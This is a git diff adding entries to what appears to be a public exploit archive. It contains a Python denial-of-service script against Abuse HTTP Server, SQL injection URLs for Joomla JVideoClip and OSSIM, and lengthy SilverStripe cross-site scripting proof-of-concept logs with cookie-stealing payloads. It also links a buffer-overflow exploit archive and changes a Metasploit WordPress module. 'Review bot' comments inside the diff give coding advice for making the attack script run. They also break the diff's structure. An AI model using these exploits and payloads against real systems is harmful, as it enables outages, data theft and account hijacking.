diff --git a/files.csv b/files.csv
index 4effcd0b7..19b583e10 100755
--- a/files.csv
+++ b/files.csv
@@ -35014,6 +35014,7 @@ id,file,description,date,author,platform,type,port
 38739,platforms/java/webapps/38739.txt,"SearchBlox Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps,0
 38740,platforms/php/webapps/38740.txt,"cm3 Acora CMS 'top.aspx' Information Disclosure Vulnerability",2013-08-26,"Pedro Andujar",php,webapps,0
 38741,platforms/linux/remote/38741.txt,"Nmap Arbitrary File Write Vulnerability",2013-08-06,"Piotr Duszynski",linux,remote,0
+38742,platforms/windows/remote/38742.txt,"Aloaha PDF Suite Stack Based Buffer Overflow Vulnerability",2013-08-28,"Marcos Accossatto",windows,remote,0
 38744,platforms/php/webapps/38744.txt,"appRain CMF Multiple Cross Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",php,webapps,0
 38745,platforms/php/webapps/38745.txt,"Xibo 'layout' Parameter HTML Injection Vulnerability",2013-08-21,"Jacob Holcomb",php,webapps,0
 38746,platforms/php/webapps/38746.html,"Xibo Cross Site Request Forgery Vulnerability",2013-08-21,"Jacob Holcomb",php,webapps,0
@@ -35043,5 +35044,9 @@ id,file,description,date,author,platform,type,port
 38770,platforms/php/webapps/38770.txt,"MentalJS Sandbox Security Bypass Vulnerability",2013-09-20,"Rafay Baloch",php,webapps,0
 38771,platforms/windows/dos/38771.py,"ShareKM Remote Denial of Service Vulnerability",2013-09-22,"Yuda Prawira",windows,dos,0
 38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A_ ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0
+38781,platforms/php/webapps/38781.txt,"AlienVault Open Source SIEM (OSSIM) 3.1 'date_from' Parameter Multiple SQL Injection Vulnerabilities",2013-10-02,"Yu-Chi Ding",php,webapps,0
 38775,platforms/linux/local/38775.rb,"Chkrootkit Local Privilege Escalation",2015-11-20,metasploit,linux,local,0
 38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0
+38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component 'uid' Parameter SQL Injection Vulnerability",2013-09-21,SixP4ck3r,php,webapps,0
+38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server Remote Denial of Service Vulnerability",2013-09-30,"Zico Ekel",multiple,dos,0
+38780,platforms/php/webapps/38780.txt,"SilverStripe Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0
diff --git a/platforms/multiple/dos/38779.py b/platforms/multiple/dos/38779.py
new file mode 100755
index 000000000..c88edbd21
--- /dev/null
+++ b/platforms/multiple/dos/38779.py
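Review bot: The added row `38781,platforms/php/webapps/38781.txt,...` is inserted between 38773 and 38775, breaking the ascending id order that the surrounding rows follow, while 38777, 38779 and 38780 are appended after 38776 in order. Keeping the index sorted by id keeps later merges small and makes duplicate ids easy to spot; move the 38781 row to directly after the 38780 row. The 38742 row in the first hunk is placed correctly.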
@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/62723/info
+
+Abuse HTTP Server is prone to a remote denial-of-service vulnerability.
+
+Attackers can exploit this issue to cause denial-of-service conditions.
+
+Abuse HTTP Server version 2.08 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/python
+
+import socket
+import os
+import sys
+
+crash = "0" * 504
+
+buffer="GET / HTTP/1.1\r\n"
+buffer+="Host: " + crash + "\r\n"
+buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
+buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"
+buffer+="Content-Length : 1048580\r\n\r\n"
+
+print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com"
+print "[*] Change some option in code with your self"
+print "[*] Connect to host and send payload"
+
+expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+expl.connect(("192.168.1.101", 80))
+expl.send(buffer)
+print "[*] Server Disconected"
+expl.close()
\ No newline at end of file
diff --git a/platforms/php/remote/38660.rb b/platforms/php/remote/38660.rb
index 20a378785..2dbe2afd4 100755
--- a/platforms/php/remote/38660.rb
+++ b/platforms/php/remote/38660.rb
@@ -8,7 +8,11 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::Remote::HTTP::Wordpress + # EDB note: + # This line causes an error when loading + # include Msf::Exploit::Remote::HTTP::Wordpress + # Replaced with the following: + include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {})
diff --git a/platforms/php/webapps/38777.txt b/platforms/php/webapps/38777.txt
new file mode 100755
index 000000000..188efb8d2
--- /dev/null
+++ b/platforms/php/webapps/38777.txt
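Review bot: The seven advisory lines at the top of 38779.py (from `source: http://www.securityfocus.com/bid/62723/info` through the `Abuse HTTP Server version 2.08 ...` sentence) sit above the `#!/usr/bin/python` shebang as bare text, so the interpreter rejects the file with a SyntaxError before any code runs; prefix each of them with `# ` or move them into a module docstring. `import os` and `import sys` are unused and can be dropped, and `buffer` shadows the Python 2 builtin of that name, so a name such as `request` would be clearer. The socket is never closed if `connect` or `send` raises; putting the three socket calls in a `try` with `expl.close()` in a `finally` keeps the handle from leaking. The `print` statements are Python 2 syntax, so either the shebang should say so explicitly (`#!/usr/bin/python2`) or the prints should be written as function calls.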
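Review bot: The EDB note says why `include Msf::Exploit::Remote::HTTP::Wordpress` was swapped for `include Msf::HTTP::Wordpress` but not which Metasploit Framework version the replacement was verified against, which matters because mixin paths move between framework releases and a later reader cannot tell whether the original or the replacement is the stale one. Extend the note with one line such as `# Verified against Metasploit Framework <version> on <date>` (placeholder values to be filled in by whoever made the change). Keeping the original include as a commented line is fine as provenance, since the note documents it. The `Metasploit3` class body continues outside the hunk.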
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/62610/info
+
+The JVideoClip component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+JVideoClip 1.5.1 is vulnerable; other versions may also be affected.
+
+http://www.example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6
\ No newline at end of file
diff --git a/platforms/php/webapps/38780.txt b/platforms/php/webapps/38780.txt
new file mode 100755
index 000000000..43ca2c22f
--- /dev/null
+++ b/platforms/php/webapps/38780.txt
@@ -0,0 +1,415 @@ +source: http://www.securityfocus.com/bid/62782/info + +SilverStripe is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible. + +SilverStripe 3.0.5 is vulnerable; other versions may also be affected. + +Proof of Concept: +================= +1.1 +The first persistent input validation web vulnerability can be exploited +by remote attackers with low privileged application user accounts and +low required user interaction. For demonstration or reproduce ... + + +PoC: Groups & Rollen (Roles) - Print + + +SilverStripe - Sicherheit + + + +

SilverStripe - Sicherheit

+ + + + + + +
VornameNachnameE-Mail
+

+Gedruckt am 11:44pm, 22/09/2013 +
+Gedruckt von a%20>"

+ + +POST +http://www.example.com/admin/security/EditForm/field/Groups/item/new/ItemEditForm +Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] +Content Size[20] Mime Type[text/html] + +Request Headers: +Host[www.example.com] +User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 +Firefox/23.0] +Accept[*/*] +Accept-Language[en-US,en;q=0.5] +Accept-Encoding[gzip, deflate] +DNT[1] +Content-Type[application/x-www-form-urlencoded; charset=UTF-8] +X-Pjax[CurrentForm,Breadcrumbs] +X-Requested-With[XMLHttpRequest] +Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/new] +Content-Length[336] +Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; +__utmb=1.8.10.1379847695; __utmc=1; +__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; +cms-panel-collapsed-cms-content-tools-CMSPagesController=true; +cms-panel-collapsed-cms-menu=false; +cms-panel-collapsed-cms-content-tools-ModelAdmin=false; +__utma=1.1551299670.1379847854.1379847854.1379847854.1; +__utmc=1; +__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +cms-panel-collapsed-cms-content-tools-AssetAdmin=true; +cms-panel-collapsed-cms-content-tools-CMSMain=false; +cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] +Connection[keep-alive] +Pragma[no-cache] +Cache-Control[no-cache] + +Post Data: +Title[a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert(%22BKM%22)%3C++++a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert(%22BKM%22)%3C] +ParentID[] +ID[] +SecurityID[1d6ca7e871bd6ec855f9409e25e030359c5b435f] +action_doSave[1] +BackURL[http%3A%2F%2Fwww.example.com%2Fadmin%2Fsecurity%2FEditForm%2Ffield%2FGroups%2Fitem%2Fnew%2F] + + +Response Headers: +Server[nginx] +Date[Sun, 22 Sep 2013 11:44:20 GMT] +Content-Type[text/html; charset=utf-8] +Connection[keep-alive] +Expires[Thu, 19 Nov 1981 08:52:00 GMT] 
+Cache-Control[no-cache, max-age=0, must-revalidate] +Pragma[no-cache] +Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:20 GMT; path=/; +httponly] +X-ControllerURL[admin/security/EditForm/field/Groups/item/4] +X-Pjax[CurrentForm,Breadcrumbs] +X-Controller[SecurityAdmin] +X-Title[SilverStripe - Sicherheit] +X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1& +plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen +%2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js? +m=1379847630,/framework/admin/javascript/SecurityAdmin.js?m=1346228457,/framework/javascript/PermissionCheckboxSetField.js?m=1346228484] +X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=1346228458,/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css? +m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css?m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css? 
+m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458,/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458] +Vary[Accept-Encoding] +Content-Encoding[gzip] +Content-Length[20] + + +Status: 200[OK] +GET http://www.example.com/admin/security/EditForm/field/Groups/item/4 +Load Flags[LOAD_BACKGROUND ] +Content Size[3966] Mime Type[text/html] + + +Request Headers: +Host[www.example.com] +User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 +Firefox/23.0] +Accept[*/*] +Accept-Language[en-US,en;q=0.5] +Accept-Encoding[gzip, deflate] +DNT[1] +X-Pjax[CurrentForm,Breadcrumbs] +X-Requested-With[XMLHttpRequest] +Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4] +Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; +__utmb=1.8.10.1379847695; __utmc=1; + +__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; +cms-panel-collapsed-cms-content-tools-CMSPagesController=true; +cms-panel-collapsed-cms-menu=false; +cms-panel-collapsed-cms-content-tools-ModelAdmin=false; +__utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1; +__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd= +organic|utmctr=(not%20provided); +cms-panel-collapsed-cms-content-tools-AssetAdmin=true; +cms-panel-collapsed-cms-content-tools-CMSMain=false; +cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] +Connection[keep-alive] + + +Response Headers: +Server[nginx] +Date[Sun, 22 Sep 2013 11:44:21 GMT] +Content-Type[text/html; charset=utf-8] +Connection[keep-alive] +Expires[Thu, 19 Nov 1981 08:52:00 GMT] +Cache-Control[no-cache, max-age=0, must-revalidate] +Pragma[no-cache] +Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:21 GMT; path=/; +httponly] +X-Controller[SecurityAdmin] +X-Title[SilverStripe - Sicherheit] 
+X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1& +plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen +%2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js? +m=1379847630,/framework/admin/javascript/SecurityAdmin.js?m=1346228457,/framework/javascript/PermissionCheckboxSetField.js?m=1346228484] +X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m= +1346228458,/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css? +m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458, +/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458,/framework/css/CheckboxSetField.css?m=1346228458] +Vary[Accept-Encoding] +Content-Encoding[gzip] +Content-Length[3966] + + +Status: 200[OK] +GET +http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/ +field/Members?Title=a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert +(%22BKM%22)%3C++++a%252&ParentID=&gridfield_relationsearch=&Members%5B +GridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2C%22 +GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22currentPage%22%3A1%7D%2C%22 +GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmail +%5D=&ID=4&SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken +<== +Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] +Content Size[378] +Mime Type[text/html] + + +Request Headers: +Host[www.example.com] +User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 +Firefox/23.0] 
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] +Accept-Language[en-US,en;q=0.5] +Accept-Encoding[gzip, deflate] +DNT[1] +Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4] +Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; +__utmb=1.8.10.1379847695; __utmc=1; +__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; cms-panel- +collapsed-cms-content-tools-CMSPagesController=true; +cms-panel-collapsed-cms-menu=false; +cms-panel-collapsed-cms-content-tools-ModelAdmin=false; +__utma=1.1551299670.1379847854.1379847854.1379847854.1; +__utmc=1; +__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +cms-panel-collapsed-cms-content-tools-AssetAdmin=true; +cms-panel-collapsed-cms-content-tools-CMSMain=false; +cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] +Connection[keep-alive] + + +Response Headers: +Server[nginx] +Date[Sun, 22 Sep 2013 11:44:26 GMT] +Content-Type[text/html; charset=utf-8] +Connection[keep-alive] +Expires[Thu, 19 Nov 1981 08:52:00 GMT] +Cache-Control[no-cache, max-age=0, must-revalidate] +Pragma[no-cache] +Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:26 GMT; path=/; +httponly] +X-Controller[SecurityAdmin] +X-Title[SilverStripe - Sicherheit] +Vary[Accept-Encoding] +Content-Encoding[gzip] +Content-Length[378] + + +Status: 200[OK] +GET +http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/[PERSISTENT +INJECTED SCRIPT CODE AS PATH!] 
+Load Flags[LOAD_DOCUMENT_URI ] +Content Size[20] +Mime Type[text/html] + + +Request Headers: +Host[www.example.com] +User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 +Firefox/23.0] +Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] +Accept-Language[en-US,en;q=0.5] +Accept-Encoding[gzip, deflate] +DNT[1] +Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/ +Members?Title=a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload +%3Dalert(%22BKM%22)%3C++++a%252&ParentID=&gridfield_relationsearch=&Members%5B +GridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2C%22 +GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22currentPage%22%3A1%7D%2C%22 +GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmai%5D=&ID=4& +SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken] +Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; +__utmb=1.8.10.1379847695; __utmc=1; +__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; +PastMember=1; +cms-panel-collapsed-cms-content-tools-CMSPagesController=true; +cms-panel-collapsed-cms-menu=false; +cms-panel-collapsed-cms-content-tools-ModelAdmin=false; +__utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1; +__utmz=1.1379847854.1.1.utmcsr=google| +utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +cms-panel-collapsed-cms-content-tools-AssetAdmin=true; +cms-panel-collapsed-cms-content-tools-CMSMain=false; +cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] +Connection[keep-alive] + + +Response Headers: +Server[nginx] +Date[Sun, 22 Sep 2013 11:44:27 GMT] +Content-Type[text/html; charset=utf-8] +Connection[keep-alive] 
+Expires[Thu, 19 Nov 1981 08:52:00 GMT] +Cache-Control[no-cache, max-age=0, must-revalidate] +Pragma[no-cache] +Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:27 GMT; path=/; +httponly] +X-Controller[SecurityAdmin] +X-Title[SilverStripe - Sicherheit] +Vary[Accept-Encoding] +Content-Encoding[gzip] +Content-Length[20] + + + +PoC: (Client-Side Link) +http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/Members +?Title=a%25[PERSISTENT INJECTED SCRIPT +CODE!]%3C++++a%252&ParentID=&gridfield_relationsearch=& +Members%5BGridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2 +C%22GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22 +currentPage%22%3A1%7D%2C%22GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmail +%5D=&ID=4&SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken + + +Reference(s): +http://ss3.demo.silverstripe.org/admin/security/show/root#Root_Roles +http://ss3.demo.silverstripe.org/admin/security/EditForm/field/Groups/item/1/edit +http://www.example.com/admin/security/EditForm/field/Roles/item/new +http://www.example.com/admin/security/EditForm/field/Groups/item/new/ItemEditForm +http://www.example.com/admin/security/EditForm/field/Groups/item/4 +http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/x + + + + + + +1.2 +The secound persistent input validation web vulnerability and filter +bypass vulnerability can be exploited by remote attackers +with low privileged application user accounts with low required user +interaction. For demonstration or reproduce ... + + +PoC: Model Admin > Add Company > Edit Company + +'>"<[PERSISTENT INJECTED SCRIPT +CODE!]>' ist kein numerischer Wert, +nur nummerische Werte sind in diesem Feld erlaubt + +
+ +
+" class="text" id="Form_ItemEditForm_CEO" /> +
+ +Note: The vulnerability is located in the message validation filter +exception-handling. + + + +--- PoC Session Request Logs --- + +Status: 200[OK] +POST +http://www.example.com/admin/test/Company/EditForm/field/Company/item/new/ItemEditForm +Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] +Content Size[1309] +Mime Type[text/html] + + +Request Headers: +Host[www.example.com] +User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 +Firefox/23.0] +Accept[*/*] +Accept-Language[en-US,en;q=0.5] +Accept-Encoding[gzip, deflate] +DNT[1] +Content-Type[application/x-www-form-urlencoded; charset=UTF-8] +X-Pjax[CurrentForm,Breadcrumbs] +X-Requested-With[XMLHttpRequest] +Referer[http://www.example.com/admin/test/Company/EditForm/field/Company/item/new?q[Name]=&q[Category]=&q[Revenue]=&q[CEO]=] +Content-Length[560] +Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; +__utmb=1.7.10.1379847695; __utmc=1; +__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; +cms-panel-collapsed-cms-content-tools-CMSPagesController=true; +cms-panel-collapsed-cms-menu=false; +cms-panel-collapsed-cms-content-tools-ModelAdmin=false; +__utma=1.1551299670.1379847854.1379847854.1379847854.1; +__utmb=1.5.10.1379847854; __utmc=1; +__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)] +Connection[keep-alive] +Pragma[no-cache] +Cache-Control[no-cache] + + +Post Data: +Name[Evolution+Security] +Category[TEST+PP] +Revenue[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E%3Cscript+alert(document.cookie)%3C%2Fscript%3E] +<= [PERSISTENT INJECTED TEST CODES!] 
+CEO[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E%3Cscript+alert(document.cookie)%3C%2Fscript%3E] +RelationFieldsTestPageID[] +GridFieldTestPageHasOneID[] +SecurityID[1d6ca7e871bd6ec855f9409e25e030359c5b435f] +action_doSave[1] +BackURL +[http%3A%2F%2Fwww.example.com%2Fadmin%2Ftest%2FCompany%2FEditForm%2Ffield%2FCompany%2Fitem%2F +new%3Fq%5BName%5D%3D%26q%5BCategory%5D%3D%26q%5BRevenue%5D%3D%26q%5BCEO%5D%3D%2F] + + +Response Headers: +Server[nginx] +Date[Sun, 22 Sep 2013 11:20:33 GMT] +Content-Type[text/html] +Connection[keep-alive] +Expires[Thu, 19 Nov 1981 08:52:00 GMT] +Cache-Control[no-cache, max-age=0, must-revalidate] +Pragma[no-cache] +Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:20:32 GMT; path=/; +httponly] +X-Controller[TestModelAdmin] +X-Title[SilverStripe - Test ModelAdmin] +X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1& +plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen +%2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js? +m=1379847630,/framework/admin/javascript/ModelAdmin.js?m=1346228457] +X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=1346228458, +/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css? +m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458, +/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458] +Vary[Accept-Encoding] +Content-Encoding[gzip] +Content-Length[1309] + + diff --git a/platforms/php/webapps/38781.txt b/platforms/php/webapps/38781.txt new file mode 100755 index 000000000..c9d04b9aa --- /dev/null +++ b/platforms/php/webapps/38781.txt 
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/62790/info
+
+Open Source SIEM (OSSIM) is prone to multiple SQL-injection vulnerabilities.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Open Source SIEM (OSSIM) 4.3.0 and prior are vulnerable.
+
+http://www.example.com/RadarReport/radar-iso27001-potential.php?date_from=%Inject_Here%
+
+http://www.example.com/RadarReport/radar-iso27001-A12IS_acquisition-pot.php?date_from=%Inject_Here%
\ No newline at end of file
diff --git a/platforms/windows/remote/38742.txt b/platforms/windows/remote/38742.txt
new file mode 100755
index 000000000..b0c894a44
--- /dev/null
+++ b/platforms/windows/remote/38742.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/62036/info
+
+Aloaha PDF Suite is prone to a stack-based buffer-overflow vulnerability.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
+
+https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/62036.zip
\ No newline at end of file